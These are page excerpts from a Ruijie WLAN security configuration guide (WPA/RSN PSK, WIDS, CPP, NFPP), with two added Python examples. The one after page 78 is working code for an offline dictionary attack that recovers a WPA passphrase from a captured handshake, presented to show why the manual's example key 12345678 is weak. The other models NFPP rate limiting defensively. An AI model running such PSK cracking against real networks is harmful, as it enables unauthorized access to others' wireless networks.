  • Page 75 Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security wpa enable Ruijie(config-wlansec)#security wpa ciphers aes enable Ruijie(config-wlansec)#security wpa akm psk enable Ruijie(config-wlansec)#security wpa akm psk set-key ascii 12345678 Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1...
  • Page 76 Configuration Guide Configuring RSNA Notes: When RSN authentication is used, the encryption mode and access authentication mode must also be configured. If the access authentication mode is set to PSK, a PSK key must be configured. In the security mode of a WLAN, RSN authentication cannot be configured together with WEP authentication. Configuration Steps ...
  • Page 77 Configuration Guide Configuring RSNA The AES and TKIP encryption modes can be enabled at the same time in WLAN security configuration mode. Configuring the Access Authentication Mode of RSN Authentication (Mandatory): It is configured in WLAN security configuration mode on the AP. ...
  • Page 78 Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security rsn enable Ruijie(config-wlansec)#security rsn ciphers aes enable Ruijie(config-wlansec)#security rsn akm psk enable Ruijie(config-wlansec)#security rsn akm psk set-key ascii 12345678 Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1...
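Added worked example (not from the Ruijie manual): what `security rsn akm psk set-key ascii 12345678` actually installs, and why the manual's placeholder key must not survive into production. In Python, following IEEE 802.11: the PMK is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits), the PTK comes from PRF-384 over the two MAC addresses and the two handshake nonces, and the EAPOL-Key MIC for AES is HMAC-SHA1-128 over the frame. Anyone who sniffs message 2 of the 4-way handshake can test passphrase guesses offline against that MIC. The SSID, MAC addresses, nonces, EAPOL frame and wordlist below are constructed; the PBKDF2 check uses the IEEE test vector (SSID "IEEE", passphrase "password").

```python
"""WPA/RSN PSK derivation and the offline guessing it permits (constructed example, not RGOS code)."""
import hashlib
import hmac


def pmk_from_psk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key, label, data, nbytes):
    """IEEE 802.11 PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, aa, spa, anonce, snonce):
    """PTK for CCMP (384 bits): KCK(16) || KEK(16) || TK(16), bound to both MACs and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_key_mic(kck, frame_with_zeroed_mic):
    """Key MIC for key descriptor version 2 (AES): first 128 bits of HMAC-SHA1 over the EAPOL-Key frame."""
    return hmac.new(kck, frame_with_zeroed_mic, hashlib.sha1).digest()[:16]


def recover_psk(wordlist, ssid, aa, spa, anonce, snonce, frame_zeroed_mic, captured_mic):
    """Offline dictionary attack: one PBKDF2 + PRF + HMAC per guess, no further traffic to the AP."""
    for guess in wordlist:
        kck = ptk_from_pmk(pmk_from_psk(guess, ssid), aa, spa, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_key_mic(kck, frame_zeroed_mic), captured_mic):
            return guess
    return None


# --- constructed "capture": what a sniffer sees in message 2 of the 4-way handshake ---
SSID = "Ruijie-demo"                          # constructed
AA = bytes.fromhex("00d0f800889f")            # AP MAC (the value shown in the manual's show output)
SPA = bytes.fromhex("00d0f8000001")           # STA MAC
ANONCE = bytes(range(32))                     # constructed; real nonces are random
SNONCE = bytes(range(32, 64))
# constructed EAPOL-Key frame (v2, type 3, length 0x75; RSN descriptor, key info 0x010a) with the MIC zeroed
FRAME_ZEROED_MIC = bytes.fromhex("0203007502010a") + bytes(0x72)


def captured_mic_for(passphrase):
    """The MIC the STA would send for a given PSK; stands in for the sniffed field."""
    kck = ptk_from_pmk(pmk_from_psk(passphrase, SSID), AA, SPA, ANONCE, SNONCE)[:16]
    return eapol_key_mic(kck, FRAME_ZEROED_MIC)


def demo():
    """Recover the manual's example key from a five-word list using only the captured handshake."""
    wordlist = ["password", "qwerty123", "letmein", "12345678", "Ruijie123"]
    return recover_psk(wordlist, SSID, AA, SPA, ANONCE, SNONCE,
                       FRAME_ZEROED_MIC, captured_mic_for("12345678"))
```

PBKDF2's 4096 iterations slow each guess down, but not enough to save an 8-digit numeric key; use a long random passphrase, or 802.1X where the infrastructure exists, so that a captured handshake is worthless.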
  • Page 79 Configuration Guide Configuring RSNA Common Errors: The WLAN has been enabled with other encryption and authentication modes (such as WEP). An RSN encryption mode is configured before RSN authentication is enabled in WLAN security configuration mode. An access authentication mode is configured before RSN authentication is enabled in WLAN security configuration mode.
  • Page 80 Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#dot1x-mab Verification Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect. Ruijie#show running-config | begin wlansec 1 wlansec 1 dot1x-mab Common Errors  The WLAN has been enabled with other encryption and authentication modes (such as WEP).
  • Page 81 Configuration Guide Configuring RSNA 1.4.5 Configuring Authentication Parameters Configuration Effect: Configure key interaction parameters. Configure the jitter prevention time in WEB authentication. Notes: Key interaction parameters take effect only in PSK or 802.1X authentication. The jitter prevention time in WEB authentication can be configured only after WEB authentication is enabled. Configuration Steps ...
  • Page 82 Configure the PSK access authentication mode for RSN authentication. Configure the PSK key 12345678. Set the unicast key negotiation packet retransmission count to 5. Configure WEB authentication. Set the jitter prevention time of WEB authentication to 900 seconds. Ruijie(config)#wlansec 1 Ruijie(config-wlansec)#security rsn enable...
  • Page 83 Configuration Guide Configuring RSNA Ruijie(config-wlansec)#security rsn ciphers aes enable Ruijie(config-wlansec)#security rsn akm psk enable Ruijie(config-wlansec)#security rsn akm psk set-key ascii 12345678 Ruijie(config-wlansec)#authtimeout paircount 5 Ruijie(config-wlansec)#webauth Ruijie(config-wlansec)#webauth prevent-jitter 900 Verification: Run the show running-config | begin wlansec wlan_id command to check whether the configuration takes effect.
  • Page 84 Configuration Guide Configuring WIDS 2 Configuring WIDS 2.1 Overview Compared with wired networks, a Wireless LAN (WLAN) has unparalleled advantages, such as convenient deployment, flexible use, low cost, and easy extension, making it more and more prevalent. However, because its channels are open, a WLAN is much more vulnerable to network threats such as rogue access points (APs), ad-hoc networks, and all types of protocol attacks.
  • Page 85 Configuration Guide Configuring WIDS AP-based: Communication cannot proceed between layer-2 users under the same AP. AP-SSID based: Communication cannot proceed between layer-2 users under the same AP and in the same WLAN. Rogue Containment Modes: Rogue containment has the following four modes: ...
  • Page 86 Configuration Guide Configuring WIDS The whitelist includes the MAC addresses of admitted STAs. If the whitelist function is enabled, only the listed STAs can access the WLAN, and all packets from other STAs are directly discarded by the AP, so as to reduce the impact of illegal packets on the WLAN. ...
  • Page 87 Configuration Guide Configuring WIDS DDoS detection function performs statistics for the attacker's packets and determines whether the number of packets per second exceeds the configured threshold. If yes, this result will be logged. If the dynamic blacklist function is enabled, the attacker will be added into the dynamic blacklist.
  • Page 88 Configuration Guide Configuring WIDS  AP-based user isolation  AP-SSID based user isolation Working Principle  AP-Based User Isolation Direct communication cannot be conducted between layer-2 STAs associated with the same AP.  AP-SSID based User Isolation Direct communication cannot be conducted between STAs in the same WLAN who are associated with the same AP. 2.3.4 Rogue Detection and Containment Network devices are usually divided into two types: illegal (Rogue) and legal.
  • Page 89 Configuration Guide Configuring WIDS 2.4 Configuration Configuration Description and Command (Optional) It is used to configure frame filtering. kickout threshold Configures the low-rate kickout threshold. whitelist mac-address Adds an entry to the whitelist. whitelist max Configures the length of the whitelist. static-blacklist mac-address Adds an entry to the static blacklist.
  • Page 90 Configuration Guide Configuring WIDS Configuration Description and Command user-isolation permit-mac Adds an entry to the permissible MAC list for user isolation. user-isolation permit-mac max Configures the length of the permissible MAC list for user isolation. (Optional) It is used to set the device detection and containment function. countermeasures enable Enables the Rogue containment function.
  • Page 91 Configuration Guide Configuring WIDS 2.4.1 Configuring Frame Filtering Configuration Effect  Configure the frame filtering rules to provide packet filtering services. Notes  An STA cannot be configured in both the static blacklist and the whitelist.  An STA cannot exist in both the blacklist and whitelist of the same SSID. Configuration Steps ...
  • Page 92 Configuration Guide Configuring WIDS  Run the static-blacklist mac-address command to add an entry to the static blacklist in WIDS configuration mode. The static blacklist filtering function effectively works only after an effective static blacklist entry is configured.  Run the static-blacklist max command to configure the maximum number of entries in the static blacklist in WIDS configuration mode, indicating the maximum number of permissible static blacklist entries on the device.
  • Page 93 Configuration Guide Configuring WIDS  Run the ssid-filter blacklist max command to configure the maximum number of entries in the SSID-based static blacklist in WIDS configuration mode. Command ssid-filter { max num | blacklist mac-address H.H.H in-ssid string | blacklist max num } Parameter max num: Indicates the maximum length of the SSID-based blacklist, ranging from 1 to 128.
  • Page 94 Configuration Guide Configuring WIDS  Check the SSID-based whitelist function. When the SSID-based whitelist is configured, STAs not included in the SSID-based whitelist cannot join this SSID service. Configuration Example 2.4.2 Configuring IDS Configuration Effect  IDS can be used to timely find and defend against malicious or unintentional attacks in WLAN. Notes ...
  • Page 95 Configuration Guide Configuring WIDS Mode Usage Guide  Configuring Flooding Attack Detection  (Optional) Flooding attack detection is disabled by default.  Run the attack-detection flood single-mac { total | assoc | reassoc | disassoc | probe | action | auth | deauth | null-data } threshold num interval time command to configure the threshold and interval of a specified type of packets for single-STA flooding attack in WIDS configuration mode.
  • Page 96 Configuration Guide Configuring WIDS auth: Indicates Authentication packets. deauth: Indicates Deauthentication packets. null-data: Indicates Null packets. num: Indicates the packet threshold of flooding attack detection ranging from 1 to 5,000. time: Indicates the interval of flooding attack detection ranging from 10 to 60 seconds. Defaults All packet thresholds of flooding attack detection, by default, 300 for single-STA, 500 for multi-STA, and 10 seconds of the statistic interval...
  • Page 97 Configuration Guide Configuring WIDS  Weak IV attack detection, detecting the weak IV packet attack.  CMCC DoS attack detection, detecting the DoS attack. Configuration Example 2.4.3 Configuring User Isolation Configuration Effect  After user isolation is configured, direct communication cannot be conducted between STAs meeting the user isolation rules.
  • Page 98 Configuration Guide Configuring WIDS Configuration Example 2.4.4 Configuring Rogue Detection and Containment Configuration Effect Configuring Rogue detection and containment suppresses illegal devices and maintains WLAN security. Notes The detection and containment of Rogue devices take effect only when the AP working mode is Hybrid or Monitor. Configuration Steps ...
  • Page 99 Configuration Guide Configuring WIDS Description config: Indicates Config containment mode, countering devices which meet entries in the SSID blacklist and static attack list. rogue: Indicates Rogue containment mode, countering devices whose RSSI is larger than the threshold. ssid: Indicates SSID containment mode, countering devices with the same SSID but not on the same AC. all: Indicates all the above containment modes.
  • Page 100 Configuration Guide Configuring WIDS Command device permit { mac-address H.H.H | mac-address max num | ssid ssid | max-ssid num | vendor bssid H.H.H | vendor bssid max num } Parameter mac-address H.H.H: Indicates the permissible MAC list entry, null by default. Description mac-address max num: Indicates the permissible MAC list length, ranging from 1 to 2,048, 1,024 by default.
  • Page 101 Configuration Guide Configuring WIDS Command device friendly-flags value Parameter Description value: Indicates the device friendly flag, ranging from 1 to 4294967295. Defaults The default value is 0. Command Mode WIDS configuration mode Usage Guide The containment function has no effect when the AP operates in Normal mode. ...
  • Page 102 Configuration Guide Configuring WIDS Description mac-address H.H.H: Configures the unknown STA list entry, empty by default. mac-address max num: Configures the unknown STA list length, ranging from 1 to 256. Defaults Unknown STA detection and containment is disabled. Command WIDS configuration mode Mode Usage Guide The containment function has no effect when the AP operates in Normal mode.
  • Page 103 Configuration Guide Configuring WIDS Description The scanning channel is null. Defaults WIDS configuration mode Command Mode Usage Guide Verification  Run the show wids detected command to display the detected results. Configuration Example 2.4.5 Configuring AP Working Mode Configuration Effect ...
  • Page 104 Configuration Guide Configuring WIDS 2.5 Monitoring Displaying Command Description show wids attack-list Displays the attack list configuration. show wids blacklist { dynamic | static } Displays the dynamic or static blacklist configuration. show wids black-ssid Displays the SSID-based blacklist configuration. show wids detected { adhoc | all | friendly ap Displays the information of detected devices of a specified type.
  • Page 105 Configuration Guide Configuring CPP 3 Configuring CPP 3.1 Overview CPU Protect Policy (CPP) is a CPU protection policy. Malicious attacks are often found in the network environment. Network devices are kept busy with forged management and protocol packets and have no time to process genuine management and protocol packets. Such attacks have a destructive impact on device security and network stability.
  • Page 106 Configuration Guide Configuring CPP All packets that are sent to the AC/AP for protocol processing must be classified (e.g., into ARP, BPDU and d1x) through packet identification (for the data classification of different products, see Configuration ).  Limiting Rate An administrator can configure the rate limit for packets of each type, thus effectively dampening high-rate attack packets on the network.
  • Page 107 Configuration Guide Configuring CPP Notes Configuration Steps  Configuring the Rate limit for Specified Packets  Optional.  Enable the CPP function on all APs unless otherwise specified.  A user can adjust the default rate limit for packets of each type according to actual requirements. Command cpu-protect type { arp | bpdu | capwap-disc | d1x | dhcp-option82 | dhcp-relay-client | dhcp-realy-server | dhcps | igmp | ipmc | ipv6-nans | isis | lldp | ospf | ospfv3 | pim | pppoe | rip | ripng...
  • Page 108 Configuration Guide Configuring CPP Default rate limit for pim: 1000pps. Default rate limit for ripng: 600pps. Command Global configuration mode Mode Usage Guide Verification  Run the show cpu-protect summary command to display the configuration. Configuration Example 3.5 Monitoring Displaying Description Command Displays the rate limit for packets of various types.
  • Page 109 Configuration Guide Configuring NFPP 4 Configuring NFPP 4.1 Overview The Network Foundation Protection Policy (NFPP) protects switches. Malicious attacks are frequently found in the network environment. These attacks place a heavy burden on switches, resulting in high CPU usage and abnormal operation. These attacks are as follows: Denial of service (DoS) attacks may greatly consume the memory, entries, or other resources of a switch, making system services unavailable.
  • Page 110 Configuration Guide Configuring NFPP rate limiting function takes effect based on each type of packets. This section uses ARP packets as an example to describe the scenario. If an attacker sends ARP attack packets while the CPU capability is insufficient, a large number of CPU resources will be consumed for processing these ARP packets.
  • Page 111 Configuration Guide Configuring NFPP In local area networks (LANs), IP addresses are resolved to MAC addresses through ARP, so protecting ARP is significant for safeguarding network security. If a large number of illegal ARP packets are sent to the gateway through the network, the gateway can no longer provide services to normal hosts.
  • Page 112 Configuration Guide Configuring NFPP authorized hosts will fail to request IPv6 addresses and therefore fail to access the network. To prevent this type of attack, limit the rate of DHCPv6 packets and detect and isolate the attack source.  ND Guard Neighbor Discovery (ND) is mainly used in IPv6 networks to perform address resolution, router discovery, prefix discovery, and redirection.
  • Page 113 Configuration Guide Configuring NFPP - The link-layer source MAC address is fixed but the source IP address changes. - The link-layer source MAC address and source IP address are fixed but the destination IP address continuously changes. Among IP packets beyond the scanning threshold received in the configured period, if the source IP address remains the same while the destination IP address continuously changes, an IP scanning attack may have occurred.
  • Page 114 Configuration Guide Configuring NFPP 4.3.5 Configuring Trusted Hosts Configure trusted hosts. Working Principle If you do not want to monitor a host, you can run the following commands to configure the host to be trusted. This trusted host will be allowed to send packets of specified types to the CPU. 4.3.6 Centralized Rate Limiting and Distribution Set the rate thresholds and percentages for Manage, Route and Protocol packets.
  • Page 115 Configuration Guide Configuring NFPP arp-guard enable Enables global attack detection. arp-guard monitor-period Configures the monitoring period. arp-guard monitored-host-limit Configures the maximum number of monitored hosts. arp-guard rate-limit Configures the global rate limit. arp-guard attack-threshold Configures the global attack threshold. arp-guard scan-threshold Configures the global host-based scanning threshold.
  • Page 116 Configuration Guide Configuring NFPP icmp-guard enable Enables global attack detection. icmp-guard monitor-period Configures the monitoring period. icmp-guard monitored-host-limit Configures the maximum number of monitored hosts. icmp-guard rate-limit Configures the global rate limit. icmp-guard attack-threshold Configures the global attack threshold. (Optional) It is used to configure ICMP trusted hosts, ICMP isolation and port-based ICMP guard.
  • Page 117 Configuration Guide Configuring NFPP dhcpv6-guard trusted-host Configures trusted hosts. nfpp dhcpv6-guard enable Enables attack detection for a port. nfpp dhcpv6-guard policy Configures the rate limit and attack threshold for a port. nfpp dhcpv6-guard isolate-period Configures the isolation period for a port. (Mandatory) It is used to configure the global ND guard function. nd-guard enable Enables global attack detection.
  • Page 118 Configuration Guide Configuring NFPP rate exceeds the rate limit, the packets beyond the rate limit are discarded. If the ARP packet rate exceeds the alarm threshold, the system prints alarm information and sends Trap packets. In host-based attack identification, the system also isolates the attack source.
  • Page 119 Configuration Guide Configuring NFPP  If the packet traffic of attackers exceeds the rate limit, you can configure the isolation period to directly discard packets and therefore save bandwidth resources.  Support the global configuration mode or interface configuration mode on the AP device. ...
  • Page 120 Configuration Guide Configuring NFPP  Configure the maximum number of monitored hosts. As the number of actually monitored hosts increases, more CPU resources are used to handle monitored hosts.  Support the global configuration mode on the AP device.  If the number of monitored hosts exceeds 1000 (default value), the administrator can set the maximum number of monitored hosts to a value smaller than 1000.
  • Page 121 Configuration Guide Configuring NFPP  In NFPP configuration mode: run the arp-guard attack-threshold {per-src-ip | per-src-mac} pps command to configure attack thresholds of hosts identified based on the source IP address, VLAN ID, and port and of hosts identified based on the link-layer source MAC address, VLAN ID, and port. ...
  • Page 122 Configuration Guide Configuring NFPP Defaults By default, no rate limit and attack threshold are configured for a port, and the global rate limit and attack threshold are used. Command Mode Interface configuration mode Usage Guide The attack threshold must be equal to or greater than the rate limit. ...
  • Page 123 Configuration Guide Configuring NFPP  If any entry matching a trusted host (the IP addresses and MAC addresses are the same) exists in the table of monitored hosts, the system automatically deletes this entry.  If the table of trusted hosts is full, the system prints the log "%ERROR: Attempt to exceed limit of 500 trusted hosts." to notify the administrator.
  • Page 124 Configuration Guide Configuring NFPP  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#arp-guard rate-limit per-src-mac 5 Ruijie (config-nfpp)#arp-guard attack-threshold per-src-mac 10 Ruijie (config-nfpp)#arp-guard isolate-period 180 Ruijie (config-nfpp)#arp-guard trusted-host 1.1.1.1 0000.0000.1111  Verification Run the show nfpp arp-guard summary command to display the configurations.
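The pages above describe how a host-based NFPP guard behaves: packets beyond the per-host rate limit are discarded, crossing the attack threshold raises an alarm and (with a non-zero isolation period) isolates the source, the attack threshold may not be lower than the rate limit, and trusted hosts are never monitored. The following Python model, added here as an illustration and not Ruijie code, replays the arp-guard example just shown (rate limit 5 pps, attack threshold 10 pps, isolation period 180 s, one trusted host). It assumes one-second counting windows and a 600-second monitoring period; the device's real internal timing is not documented on this page.

```python
"""Model of an NFPP-style per-source-MAC guard (constructed example, not Ruijie code)."""
from collections import Counter, defaultdict

# Limit quoted from the "%ERROR: Attempt to exceed limit of 500 trusted hosts." log text.
TRUSTED_HOST_LIMIT = 500


class HostGuard:
    """Rate limit, attack threshold, isolation and trusted hosts for one packet type.

    Assumed simplification: packets are counted per source MAC in one-second
    windows, so a rate of N pps means N packets seen within the same second.
    """

    def __init__(self, rate_limit, attack_threshold, isolate_period=0, monitor_period=600):
        # The guide states the attack threshold must be >= the rate limit.
        if attack_threshold < rate_limit:
            raise ValueError(
                f"%ERROR: attack threshold is smaller than rate limit {rate_limit}pps.")
        self.rate_limit = rate_limit
        self.attack_threshold = attack_threshold
        self.isolate_period = isolate_period
        self.monitor_period = monitor_period
        self.trusted = set()
        self.isolated = {}              # mac -> time at which isolation ends
        self.monitored = {}             # mac -> time at which the monitored entry times out
        self.counts = defaultdict(int)  # (mac, second) -> packets seen in that second
        self.logs = []

    def add_trusted(self, mac):
        """Add a trusted host; a matching monitored/isolated entry is dropped."""
        if len(self.trusted) >= TRUSTED_HOST_LIMIT:
            self.logs.append(
                f"%ERROR: Attempt to exceed limit of {TRUSTED_HOST_LIMIT} trusted hosts.")
            return False
        self.trusted.add(mac)
        self.monitored.pop(mac, None)
        self.isolated.pop(mac, None)
        return True

    def handle(self, mac, t):
        """Return 'forward', 'drop-ratelimit' or 'drop-isolated' for one packet at time t."""
        if mac in self.trusted:
            return "forward"
        if mac in self.isolated:
            if t < self.isolated[mac]:
                return "drop-isolated"
            del self.isolated[mac]      # isolation period has elapsed
        if mac in self.monitored and t >= self.monitored[mac]:
            del self.monitored[mac]     # monitoring period has elapsed
        key = (mac, int(t))
        self.counts[key] += 1
        n = self.counts[key]
        if n > self.attack_threshold and mac not in self.monitored:
            # Alarm once per monitoring period; isolate if a period is configured.
            self.logs.append(f"ALARM: {mac} exceeded {self.attack_threshold}pps at t={t}")
            self.monitored[mac] = t + self.monitor_period
            if self.isolate_period > 0:
                self.isolated[mac] = t + self.isolate_period
        if n > self.rate_limit:
            return "drop-ratelimit"
        return "forward"


def run_scenario():
    """Replay the arp-guard example (constructed traffic); return a summary dict."""
    g = HostGuard(rate_limit=5, attack_threshold=10, isolate_period=180)
    g.add_trusted("0000.0000.1111")
    attacker = "0000.0000.2222"          # constructed, not a real host
    burst = Counter()
    for _ in range(12):                  # 12 ARP frames inside one second
        burst[g.handle(attacker, 0)] += 1
    return {
        "burst": dict(burst),
        "during_isolation": g.handle(attacker, 1),
        "after_isolation": g.handle(attacker, 180),
        "trusted_forwarded": all(g.handle("0000.0000.1111", 0) == "forward" for _ in range(50)),
        "alarms": len(g.logs),
    }


if __name__ == "__main__":
    print(run_scenario())
```

In the replayed burst the first five frames are forwarded, frames six to eleven are dropped by the rate limit, the eleventh also raises the alarm and starts the isolation timer, and every later frame from that MAC is dropped until the 180-second period ends, while the trusted host is never counted at all.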
  • Page 125 Configuration Guide Configuring NFPP the alarm threshold, the system prints alarm information and sends Trap packets. In host-based attack identification, the system also isolates the attack source.  IP guard can also detect IP scanning attacks. IP anti-scanning applies to IP packet attacks as follows: the destination IP address continuously changes but the source IP address remains the same, and the destination IP address is not the IP address of the local device.
  • Page 126 Configuration Guide Configuring NFPP  If the packet traffic of attackers exceeds the rate limit of the CPP, you can configure the isolation period to directly discard packets and therefore save bandwidth resources.  Support the global configuration mode or interface configuration mode on the AP device. ...
  • Page 127 Configuration Guide Configuring NFPP  Mandatory.  Increase the maximum number of monitored hosts. As the number of actually monitored hosts increases, more CPU resources are used to handle monitored hosts.  Support the global configuration mode on the AP device. ...
  • Page 128 Configuration Guide Configuring NFPP Parameter per-src-ip: Limits the rate for each source IP address. Description per-port: Limits the rate for each port. pps: Indicates the rate limit, ranging from 1 to 9,999. Defaults See the product feature document. Command NFPP configuration mode Mode Usage Guide Command...
  • Page 129 Configuration Guide Configuring NFPP Command NFPP configuration mode Mode Usage Guide Command nfpp ip-guard scan-threshold pkt-cnt Parameter pkt-cnt: Indicates the scanning threshold, ranging from 1 to 9,999. Description Defaults By default, no port-based IP scanning threshold is configured and the global IP scanning threshold is used. Command Interface configuration mode Mode...
  • Page 130  Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#ip-guard rate-limit per-src-ip 20 Ruijie (config-nfpp)#ip-guard attack-threshold per-src-ip 30 Ruijie (config-nfpp)#ip-guard isolate-period 180 Ruijie (config-nfpp)#ip-guard trusted-host 192.168.201.46 255.255.255.255  Verification Run the show nfpp ip-guard summary command to display the configurations.
  • Page 131 Configuration Guide Configuring NFPP IP address mask ---------- ---- 192.168.201.46 255.255.255.255 Total: 1 record(s) 4.4.3 Configuring ICMP Guard Configuration Effect  ICMP attacks are identified based on hosts or ports. In host-based attack identification, ICMP attacks are identified based on the source IP address, VLAN ID, and port. Each type of attack identification has a rate limit and an alarm threshold.
  • Page 132 Configuration Guide Configuring NFPP  Configuring the Isolation Period  (Optional) Isolation is disabled by default.  If the packet traffic of attackers exceeds the rate limit of the CPP, you can configure the isolation period to directly discard packets and therefore save bandwidth resources. ...
  • Page 133 Configuration Guide Configuring NFPP Usage Guide If the isolation period is 0, the system performs software monitoring on detected attackers. The timeout period is the monitoring period. During software monitoring, if the isolation period is set to a non-zero value, the system automatically performs isolation against attackers monitored by software and sets the timeout period as the monitoring period.
  • Page 134 Configuration Guide Configuring NFPP  If the configured attack threshold is smaller than the rate limit, the system prints the log "%ERROR: attack threshold is smaller than rate limit 300pps." to notify the administrator.  If memory cannot be allocated for detected attackers, the system prints "%NFPP_ICMP_GUARD-4-NO_MEMORY: Failed to alloc memory."...
  • Page 135 Configuration Guide Configuring NFPP Mode Usage Guide The attack threshold must be equal to or greater than the rate limit.  Configuring Trusted Hosts  (Optional) No trusted host is configured by default.  For ICMP anti-scanning, you can configure a maximum of 500 IP addresses not to be monitored. ...
  • Page 136 Steps Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#icmp-guard rate-limit per-src-ip 20 Ruijie (config-nfpp)#icmp-guard attack-threshold per-src-ip 30 Ruijie (config-nfpp)#icmp-guard isolate-period 180 Ruijie (config-nfpp)#icmp-guard trusted-host 192.168.201.46 255.255.255.255  Verification Run the show nfpp icmp-guard summary command to display the configurations.
  • Page 137 Configuration Guide Configuring NFPP DHCP packet rate exceeds the alarm threshold, the system prints alarm information and sends Trap packets. In host-based attack identification, the system also isolates the attack source. Notes  For a command that is configured both in global configuration mode and interface configuration mode, the configuration in interface configuration mode takes priority over that configured in global configuration mode.
  • Page 138 Configuration Guide Configuring NFPP Parameter seconds: Indicates the isolation period in the unit of second. It can be set to 0 or any value from 30 to Description 86,400. The value 0 indicates no isolation. permanent: Indicates permanent isolation. Defaults The default global isolation period is 0, that is, no isolation.
  • Page 139 Configuration Guide Configuring NFPP  Increase the maximum number of monitored hosts. As the number of actually monitored hosts increases, more CPU resources are used to handle monitored hosts.  Support the global configuration mode on the AP device.  If the number of monitored hosts exceeds 1000 (default value), the administrator can set the maximum number of monitored hosts to a value smaller than 1000.
  • Page 140 Configuration Guide Configuring NFPP  In NFPP configuration mode: run the dhcp-guard attack-threshold { per-src-mac | per-port } pps command to configure the global attack threshold. That is, when the packet rate exceeds the attack threshold, it is considered that attack behaviors exist.
  • Page 141 DHCP packet traffic of some hosts is very large in the system, and these packets need to pass through.  Configuration Configure the host-based attack threshold.  Steps Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp...
  • Page 142 Configuration Guide Configuring NFPP Ruijie (config-nfpp)#dhcp-guard rate-limit per-src-mac 8 Ruijie (config-nfpp)#dhcp-guard attack-threshold per-src-mac 16 Ruijie (config-nfpp)#dhcp-guard isolate-period 180 Ruijie (config-nfpp)#dhcp-guard trusted-host 0000.0000.1111  Verification Run the show nfpp dhcp-guard summary command to display the configurations. (Format of column Rate-limit and Attack-threshold is per-src-ip/per-src-mac/per-port.)
  • Page 143 Configuration Guide Configuring NFPP Configuration Steps  Enabling Attack Detection  (Mandatory) Attack detection is enabled by default.  Support the global configuration mode or interface configuration mode on the AP device.  If DHCPv6 guard is disabled, the system automatically clears monitored hosts. Command dhcpv6-guard enable Parameter...
  • Page 144 Configuration Guide Configuring NFPP isolation period). For a port, if the port-based isolation period is not configured, the global isolation period is used; otherwise, the port-based isolation period is used. Command nfpp dhcpv6-guard isolate-period [ seconds | permanent ] Parameter seconds: Indicates the isolation period in the unit of second.
  • Page 145 Configuration Guide Configuring NFPP of monitored hosts." This information notifies the administrator that the configuration does not take effect and that part of monitored hosts need to be deleted.  If the table of monitored hosts is full, the system prints the log "% NFPP_DHCPV6_GUARD-4-SESSION_LIMIT: Attempt to exceed limit of 1000 monitored hosts."...
  • Page 146 Configuration Guide Configuring NFPP Description per-port: Limits the rate for each port. pps: Indicates the rate limit, ranging from 1 to 9,999. Defaults The default rate limit for each source MAC address is 5 pps. The default rate limit for each port is 150 pps. Command NFPP configuration mode Mode...
  • Page 147 Steps Set the isolation period to a non-zero value.  Configure trusted hosts. Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)#dhcpv6-guard rate-limit per-src-mac 8 Ruijie (config-nfpp)#dhcpv6-guard attack-threshold per-src-mac 16 Ruijie (config-nfpp)#dhcpv6-guard isolate-period 180 Ruijie (config-nfpp)#dhcpv6-guard trusted-host 0000.0000.1111  Verification Run the show nfpp dhcpv6-guard summary command to display the configurations.
  • Page 148 Configuration Guide Configuring NFPP Interface Status Isolate-period Rate-limit Attack-threshold Global Disable 180 -/8/150 -/16/300 Maximum count of monitored hosts: 1000 Monitor period: 600s  Run the show nfpp dhcpv6-guard hosts command to display monitored hosts. If col_filter 1 shows '*', it means "hardware do not isolate host". VLAN interface MAC address...
  • Page 149 Configuration Guide Configuring NFPP Parameter Description Defaults ND guard is enabled by default. Command NFPP configuration mode Mode Usage Guide Command nfpp nd-guard enable Parameter Description Defaults ND guard is configured in global configuration mode, but not in interface configuration mode. Command Interface configuration mode Mode...
  • Page 150 Configuration Guide Configuring NFPP default rate limit for RAs and Redirect packets is 15 pps. Command NFPP configuration mode Mode Usage Guide Command nd-guard attack-threshold per-port [ ns-na | rs | ra-redirect ] pps Parameter ns-na: Indicates NSs and NAs. Description rs: Indicates RSs.
  • Page 151 ND packet traffic of some hosts is very large in the system, and these packets need to pass through.  Configuration Configure the host-based attack threshold. Steps Ruijie# configure terminal Ruijie(config)# nfpp Ruijie (config-nfpp)# nd-guard rate-limit per-port ns-na 30 Ruijie (config-nfpp)# nd-guard attack-threshold per-port ns-na 50 Ruijie (config-nfpp)#nd-guard trusted-host 0000.0000.1111...
  • Page 152 Configuration Guide Configuring NFPP  Verification Run the show nfpp nd-guard summary command to display the configurations. (Format of column Rate-limit and Attack-threshold is NS-NA/RS/RA-REDIRECT.) Interface Status Rate-limit Attack-threshold Global Disable 30/15/15  Run the show nfpp nd-guard trusted-host command to display trusted hosts. ---- 0000.0000.1111 Total: 1 record(s)
  • Page 153 Configure the maximum bandwidth for each type of packets.  Steps Configure the maximum percentage of each type of packets in the queue. Ruijie# configure terminal Ruijie(config)# cpu-protect sub-interface manage pps 5000 Ruijie(config)# cpu-protect sub-interface manage percent 25 Verification Omitted. 4.4.8 Configuring NFPP Log Information...
